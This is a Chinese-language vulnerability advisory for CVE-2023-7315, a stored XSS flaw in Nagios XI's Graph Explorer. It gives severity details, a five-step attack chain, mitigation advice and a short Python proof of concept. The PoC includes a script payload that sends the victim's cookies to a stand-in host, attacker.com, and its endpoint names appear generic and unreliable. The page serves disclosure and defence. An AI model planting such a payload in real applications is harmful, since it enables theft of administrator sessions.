CVE-2023-7315 CVSS 5.4 中危

CVE-2023-7315: Nagios XI Graph Explorer存储型XSS漏洞

披露日期: 2025-10-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-7315

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Nagios XI

漏洞概述

CVE-2023-7315是Nagios XI软件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于Graph Explorer组件中，由于对用户提供的输入验证或转义不足，攻击者可以注入恶意脚本代码。当其他用户访问包含恶意代码的页面时，这些脚本将在受害者浏览器上下文中执行，从而窃取会话令牌、劫持用户账户或执行其他恶意操作。攻击者需要具有低权限用户账户并诱导具有更高权限的用户访问恶意内容。该漏洞影响Nagios XI 5.11.3之前的所有版本，CVSS评分5.4属于中等严重程度，攻击复杂度低但需要用户交互。

技术细节

该漏洞是由于Nagios XI的Graph Explorer组件在处理用户输入时未进行充分的输入验证和输出转义。Graph Explorer用于可视化监控数据，允许用户创建和查看各种图表。攻击者可以在图表名称、标签或相关参数中嵌入恶意JavaScript代码（如<script>标签或事件处理器）。由于这些输入被存储在数据库中并在后续页面访问时直接渲染到HTML中，形成了存储型XSS。当管理员或其他用户访问受污染的图表时，恶意脚本会以该用户的权限执行。攻击者可利用此漏洞窃取认证cookie、冒充合法用户执行操作或传播恶意内容。攻击向量为网络路径，攻击者需要具备低权限账户并诱导目标用户访问恶意内容。

攻击链分析

STEP 1

步骤1

攻击者获取Nagios XI低权限账户访问权限

STEP 2

步骤2

攻击者构造恶意XSS payload并提交到Graph Explorer组件

STEP 3

步骤3

恶意脚本被存储在数据库中，成为持久化威胁

STEP 4

步骤4

管理员或高权限用户访问受感染的图表页面

STEP 5

步骤5

恶意脚本在受害者浏览器中执行，窃取认证令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2023-7315 PoC - Nagios XI Graph Explorer XSS
# Target: Nagios XI < 5.11.3
# Component: Graph Explorer

target_url = "http://target-nagios-xi.local/nagiosxi/"

# Login with low-privilege account
login_data = {
    "username": "attacker",
    "password": "attacker_password",
    "loginButton": "Login"
}

session = requests.Session()
# session.post(target_url + "login.php", data=login_data)

# XSS payload for Graph Explorer
xss_payload = "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"

# Inject XSS via Graph Explorer component
# graph_data = {
#     "graph_name": xss_payload,
#     "component": "graph_explorer",
#     "action": "save"
# }
# response = session.post(target_url + "graphs/create.php", data=graph_data)

print("PoC for CVE-2023-7315")
print("Target: Nagios XI Graph Explorer XSS")
print(f"Payload: {xss_payload}")
print("Steps:")
print("1. Authenticate with low-privilege account")
print("2. Create/modify graph with XSS payload in name field")
print("3. Wait for admin to view the graph")
print("4. XSS executes, stealing admin cookies")

影响范围

Nagios XI < 5.11.3

防御指南

临时缓解措施

如果无法立即升级，可临时禁用Graph Explorer组件的编辑功能，限制低权限用户创建自定义图表，同时加强对Graph Explorer相关端点的Web应用防火墙(WAF)规则，对<script>标签和事件处理器属性进行过滤和拦截。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表